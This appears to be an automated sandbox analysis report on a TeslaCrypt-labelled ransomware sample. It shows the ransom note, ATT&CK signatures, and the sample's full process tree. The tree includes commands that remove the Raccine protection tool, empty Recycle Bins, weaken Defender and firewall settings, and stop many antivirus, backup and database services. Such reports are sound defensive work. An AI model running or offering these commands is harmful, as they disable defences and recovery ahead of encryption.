teslacrypt | f42f289579c0ea0fb6e03342144718ac553d8f157155bd854084719291be84e8

Analysis

max time kernel
83s
max time network
112s
platform
windows10_x64
resource
win10v20201028
submitted
04-02-2021 19:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bbc[1].exe

Score

10^/10

teslacrypt discovery evasion ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

Don't worry, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. We also downloaded your corporate files (databases, tables, accounting information, etc.) and we will have to publish them if you do not agree to cooperation. To get this software you need write on our e-mail: workplus111@protonmail.com Reserve e-mail address to contact us: worker400@airmail.cc Key Identifier: G9YzkxdhROX9K7TkivUhV5mz8r5i0LTEWio5Rme01VfPgwYQN1Pj6ZgRxBdIDdRJqsvxsOffZRq2edhIblNm0QMZDYHevK/w/b2muhKlbfydG2nXhUCwuKplSjR1Z6H/SzVYLWe83tVKPo85CwP+xVXLbhu/qEnEOPH0AX5UL6Np2G0d/cRkkIwfu/iUXnUwCzno9l2EYe+05ph7I6j4TGK5WWKcVhqEC8aZfhaD4UGRssHa+xPlIuQRAgwT4Yic5UsIxb0iz+s+VI6tZH169IAJipzoPdmxBA/mJH4h3CW+4As0WMTh1YuexPqR9Gn82FLdsP9EiX6McI0wVAAswYJ65wNXWhBa/9eFNZJuaUbzFPritH+I7fd7G0EeK4Jyczs2BoNWVnFRiQnvAy99yhONrptL3t6HCNS1U4+gDyH7+zIeds1efdwELRKkdPJV3xAPv0vRco9CTKIVfmYQpb668Zr905VOiyxaIqgEJYCRkzf9NTKpwE1vsZ2yCbzVHMVae/NVdvDsMK7BT2uGqTl2GTSZVAizpkQJxbV0V/V/YwaBhvMIoR0BuD4987n8vhgeD+9Ducd5sAOtjVt5UyRnVv/nlbveSqXlhPEu8bMjOH+K9BZOQ5yZKEGIgivqFpf+zJyO4qtp64jI66AmECq2aa2bywZ5JfzGXBOm3gE=

Emails

workplus111@protonmail.com

worker400@airmail.cc

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Ransom Note

Emails

workplus111@protonmail.com

worker400@airmail.cc

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.
ransomware teslacrypt
Executes dropped EXE 1 IoCs

Processes:

tm94ra6g.exe

pid process

2828 tm94ra6g.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

tm94ra6g.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\ConnectRename.raw => C:\Users\Admin\Pictures\ConnectRename.raw.fsvlf4	tm94ra6g.exe
File renamed	C:\Users\Admin\Pictures\DisableRequest.raw => C:\Users\Admin\Pictures\DisableRequest.raw.fsvlf4	tm94ra6g.exe
File renamed	C:\Users\Admin\Pictures\ExitSkip.raw => C:\Users\Admin\Pictures\ExitSkip.raw.fsvlf4	tm94ra6g.exe
File opened for modification	C:\Users\Admin\Pictures\SelectClose.tiff	tm94ra6g.exe
File renamed	C:\Users\Admin\Pictures\SelectClose.tiff => C:\Users\Admin\Pictures\SelectClose.tiff.fsvlf4	tm94ra6g.exe

Drops startup file 1 IoCs

Processes:

tm94ra6g.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk tm94ra6g.exe
Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

7372 icacls.exe
7336 icacls.exe
7288 icacls.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	tm94ra6g.exe

pid	process
7372	icacls.exe
7336	icacls.exe
7288	icacls.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

tm94ra6g.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	tm94ra6g.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	tm94ra6g.exe

Drops file in Windows directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\Logs\DISM\dism.log powershell.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

16504 net.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\DISM\dism.log	powershell.exe

pid	process
16504	net.exe

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
7152	taskkill.exe
6808	taskkill.exe
7324	taskkill.exe
7060	taskkill.exe
6920	taskkill.exe
6888	taskkill.exe
9188	taskkill.exe
9148	taskkill.exe
9280	taskkill.exe
9236	taskkill.exe
9108	taskkill.exe
9028	taskkill.exe
9124	taskkill.exe
9116	taskkill.exe
9172	taskkill.exe
9156	taskkill.exe
9132	taskkill.exe
9092	taskkill.exe
9084	taskkill.exe
9076	taskkill.exe
9256	taskkill.exe
5764	taskkill.exe
9012	taskkill.exe
5852	taskkill.exe
9180	taskkill.exe
9068	taskkill.exe
9220	taskkill.exe
7404	taskkill.exe
7028	taskkill.exe
9036	taskkill.exe
7448	taskkill.exe
7364	taskkill.exe
9196	taskkill.exe
2032	taskkill.exe
9244	taskkill.exe
6996	taskkill.exe
6964	taskkill.exe
6840	taskkill.exe
9164	taskkill.exe
9264	taskkill.exe
9228	taskkill.exe
7276	taskkill.exe
7124	taskkill.exe
9204	taskkill.exe
9052	taskkill.exe
9044	taskkill.exe
6956	taskkill.exe
9272	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1096 reg.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

13156 notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4852 PING.EXE

pid	process
1096	reg.exe

pid	process
13156	notepad.exe

pid	process
4852	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

tm94ra6g.exe

pid	process
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

tm94ra6g.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2828	tm94ra6g.exe
Token: SeDebugPrivilege	3592	powershell.exe
Token: SeDebugPrivilege	2032	taskkill.exe
Token: SeDebugPrivilege	9012	taskkill.exe
Token: SeDebugPrivilege	5764	taskkill.exe
Token: SeDebugPrivilege	9108	taskkill.exe
Token: SeDebugPrivilege	9124	taskkill.exe
Token: SeDebugPrivilege	9236	taskkill.exe
Token: SeDebugPrivilege	6808	taskkill.exe
Token: SeDebugPrivilege	9084	taskkill.exe
Token: SeDebugPrivilege	5852	taskkill.exe
Token: SeDebugPrivilege	6920	taskkill.exe
Token: SeDebugPrivilege	9036	taskkill.exe
Token: SeDebugPrivilege	7404	taskkill.exe
Token: SeDebugPrivilege	9228	taskkill.exe
Token: SeDebugPrivilege	6956	taskkill.exe
Token: SeDebugPrivilege	7060	taskkill.exe
Token: SeDebugPrivilege	7364	taskkill.exe
Token: SeDebugPrivilege	7276	taskkill.exe
Token: SeDebugPrivilege	9172	taskkill.exe
Token: SeDebugPrivilege	9164	taskkill.exe
Token: SeDebugPrivilege	9188	taskkill.exe
Token: SeDebugPrivilege	9052	taskkill.exe
Token: SeDebugPrivilege	9180	taskkill.exe
Token: SeDebugPrivilege	7152	taskkill.exe
Token: SeDebugPrivilege	9196	taskkill.exe
Token: SeDebugPrivilege	9076	taskkill.exe
Token: SeDebugPrivilege	9044	taskkill.exe
Token: SeDebugPrivilege	9244	taskkill.exe
Token: SeDebugPrivilege	9132	taskkill.exe
Token: SeDebugPrivilege	9068	taskkill.exe
Token: SeDebugPrivilege	7028	taskkill.exe
Token: SeDebugPrivilege	9280	taskkill.exe
Token: SeDebugPrivilege	9028	taskkill.exe
Token: SeDebugPrivilege	7448	taskkill.exe
Token: SeDebugPrivilege	9116	taskkill.exe
Token: SeDebugPrivilege	6888	taskkill.exe
Token: SeDebugPrivilege	9156	taskkill.exe
Token: SeDebugPrivilege	9264	taskkill.exe
Token: SeDebugPrivilege	9272	taskkill.exe
Token: SeDebugPrivilege	6964	taskkill.exe
Token: SeDebugPrivilege	7324	taskkill.exe
Token: SeDebugPrivilege	7124	taskkill.exe
Token: SeDebugPrivilege	9092	taskkill.exe
Token: SeDebugPrivilege	6840	taskkill.exe
Token: SeDebugPrivilege	9256	taskkill.exe
Token: SeDebugPrivilege	9148	taskkill.exe
Token: SeDebugPrivilege	9220	taskkill.exe
Token: SeDebugPrivilege	6996	taskkill.exe
Token: SeDebugPrivilege	8932	powershell.exe
Token: SeDebugPrivilege	7068	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

tm94ra6g.exe

pid process

2828 tm94ra6g.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

tm94ra6g.exe

pid process

2828 tm94ra6g.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

bbc[1].exetm94ra6g.exe

description	pid	process	target process
PID 4048 wrote to memory of 2828	4048	bbc[1].exe	tm94ra6g.exe
PID 4048 wrote to memory of 2828	4048	bbc[1].exe	tm94ra6g.exe
PID 4048 wrote to memory of 2828	4048	bbc[1].exe	tm94ra6g.exe
PID 2828 wrote to memory of 3592	2828	tm94ra6g.exe	powershell.exe
PID 2828 wrote to memory of 3592	2828	tm94ra6g.exe	powershell.exe
PID 2828 wrote to memory of 3592	2828	tm94ra6g.exe	powershell.exe
PID 2828 wrote to memory of 2032	2828	tm94ra6g.exe	taskkill.exe
PID 2828 wrote to memory of 2032	2828	tm94ra6g.exe	taskkill.exe
PID 2828 wrote to memory of 2032	2828	tm94ra6g.exe	taskkill.exe
PID 2828 wrote to memory of 2100	2828	tm94ra6g.exe	reg.exe
PID 2828 wrote to memory of 2100	2828	tm94ra6g.exe	reg.exe
PID 2828 wrote to memory of 2100	2828	tm94ra6g.exe	reg.exe
PID 2828 wrote to memory of 1096	2828	tm94ra6g.exe	reg.exe
PID 2828 wrote to memory of 1096	2828	tm94ra6g.exe	reg.exe
PID 2828 wrote to memory of 1096	2828	tm94ra6g.exe	reg.exe
PID 2828 wrote to memory of 908	2828	tm94ra6g.exe	schtasks.exe
PID 2828 wrote to memory of 908	2828	tm94ra6g.exe	schtasks.exe
PID 2828 wrote to memory of 908	2828	tm94ra6g.exe	schtasks.exe
PID 2828 wrote to memory of 3096	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 3096	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 3096	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 1892	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 1892	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 1892	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 3964	2828	tm94ra6g.exe	cmd.exe
PID 2828 wrote to memory of 3964	2828	tm94ra6g.exe	cmd.exe
PID 2828 wrote to memory of 3964	2828	tm94ra6g.exe	cmd.exe
PID 2828 wrote to memory of 3848	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 3848	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 3848	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 3928	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 3928	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 3928	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 1508	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 1508	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 1508	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 2640	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 2640	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 2640	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 4064	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 4064	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 4064	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 3192	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 3192	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 3192	2828	tm94ra6g.exe	sc.exe
PID 2828 wrote to memory of 3960	2828	tm94ra6g.exe	net.exe
PID 2828 wrote to memory of 3960	2828	tm94ra6g.exe	net.exe
PID 2828 wrote to memory of 3960	2828	tm94ra6g.exe	net.exe
PID 2828 wrote to memory of 1544	2828	tm94ra6g.exe	cmd.exe
PID 2828 wrote to memory of 1544	2828	tm94ra6g.exe	cmd.exe
PID 2828 wrote to memory of 1544	2828	tm94ra6g.exe	cmd.exe
PID 2828 wrote to memory of 3824	2828	tm94ra6g.exe	netsh.exe
PID 2828 wrote to memory of 3824	2828	tm94ra6g.exe	netsh.exe
PID 2828 wrote to memory of 3824	2828	tm94ra6g.exe	netsh.exe
PID 2828 wrote to memory of 2260	2828	tm94ra6g.exe	net.exe
PID 2828 wrote to memory of 2260	2828	tm94ra6g.exe	net.exe
PID 2828 wrote to memory of 2260	2828	tm94ra6g.exe	net.exe
PID 2828 wrote to memory of 2576	2828	tm94ra6g.exe	net.exe
PID 2828 wrote to memory of 2576	2828	tm94ra6g.exe	net.exe
PID 2828 wrote to memory of 2576	2828	tm94ra6g.exe	net.exe
PID 2828 wrote to memory of 3616	2828	tm94ra6g.exe	net.exe
PID 2828 wrote to memory of 3616	2828	tm94ra6g.exe	net.exe
PID 2828 wrote to memory of 3616	2828	tm94ra6g.exe	net.exe
PID 2828 wrote to memory of 1732	2828	tm94ra6g.exe	net.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

tm94ra6g.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	tm94ra6g.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	tm94ra6g.exe

C:\Users\Admin\AppData\Local\Temp\bbc[1].exe
"C:\Users\Admin\AppData\Local\Temp\bbc[1].exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4048

C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe
"C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe"
2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops startup file
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2828

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3592

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
3⤵
PID:2100

C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
3⤵
- Modifies registry key
PID:1096

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
3⤵
PID:908

C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
3⤵
PID:3096

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
3⤵
PID:1892

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
3⤵
PID:3964

C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
3⤵
PID:3848

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
3⤵
PID:1508

C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
3⤵
PID:2640

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
3⤵
PID:3192

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
3⤵
PID:1544

C:\Windows\SysWOW64\net.exe
"net.exe" start FDResPub /y
3⤵
PID:2260

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start FDResPub /y
4⤵
PID:4128

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
3⤵
PID:3824

C:\Windows\SysWOW64\net.exe
"net.exe" start Dnscache /y
3⤵
PID:3960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Dnscache /y
4⤵
PID:2456

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
PID:4064

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
3⤵
PID:3928

C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
3⤵
PID:2576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
4⤵
PID:4220

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
3⤵
PID:3616

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
4⤵
PID:4204

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
3⤵
PID:1732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
4⤵
PID:4296

C:\Windows\SysWOW64\net.exe
"net.exe" stop bedbg /y
3⤵
PID:3516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
4⤵
PID:4348

C:\Windows\SysWOW64\net.exe
"net.exe" start SSDPSRV /y
3⤵
PID:1644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
4⤵
PID:4452

C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
3⤵
PID:3692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
4⤵
PID:4464

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
3⤵
PID:1388

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
4⤵
PID:4660

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
3⤵
PID:1808

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
4⤵
PID:4532

C:\Windows\SysWOW64\net.exe
"net.exe" start upnphost /y
3⤵
PID:2408

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start upnphost /y
4⤵
PID:4476

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
3⤵
PID:4144

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQL_2008 /y
3⤵
PID:4396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
4⤵
PID:4904

C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
3⤵
PID:4520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
4⤵
PID:4996

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
3⤵
PID:4776

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
4⤵
PID:8188

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
3⤵
PID:4680

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
4⤵
PID:4136

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
3⤵
PID:4616

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
4⤵
PID:5112

C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
3⤵
PID:4568

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
4⤵
PID:5084

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
3⤵
PID:4424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
4⤵
PID:5004

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
3⤵
PID:4860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
4⤵
PID:6932

C:\Windows\SysWOW64\net.exe
"net.exe" stop MMS /y
3⤵
PID:4948

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
4⤵
PID:11120

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQLEXPRESS /y
3⤵
PID:5024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
4⤵
PID:12040

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SQL_2008 /y
3⤵
PID:4824

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
4⤵
PID:13632

C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
3⤵
PID:7456

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
4⤵
PID:14540

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
3⤵
PID:7464

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
4⤵
PID:14572

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
3⤵
PID:7472

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
4⤵
PID:14548

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
3⤵
PID:7480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
4⤵
PID:14564

C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
3⤵
PID:7488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
4⤵
PID:14532

C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
3⤵
PID:7496

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
4⤵
PID:14556

C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
3⤵
PID:7504

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
4⤵
PID:14516

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
3⤵
PID:7512

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
4⤵
PID:14524

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
3⤵
PID:7520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
4⤵
PID:14508

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
3⤵
PID:7528

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
4⤵
PID:14500

C:\Windows\SysWOW64\net.exe
"net.exe" stop DCAgent /y
3⤵
PID:6772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
4⤵
PID:14864

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SHAREPOINT /y
3⤵
PID:6764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
4⤵
PID:14612

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
3⤵
PID:6756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
4⤵
PID:14596

C:\Windows\SysWOW64\net.exe
"net.exe" stop AVP /y
3⤵
PID:6740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
4⤵
PID:14604

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /y
3⤵
PID:6732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
4⤵
PID:14620

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /
3⤵
PID:6724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
4⤵
PID:14628

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
3⤵
PID:6716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
4⤵
PID:14644

C:\Windows\SysWOW64\net.exe
"net.exe" stop Antivirus /y
3⤵
PID:6708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
4⤵
PID:14636

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROFXENGAGEMENT /y
3⤵
PID:6700

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
4⤵
PID:14684

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
3⤵
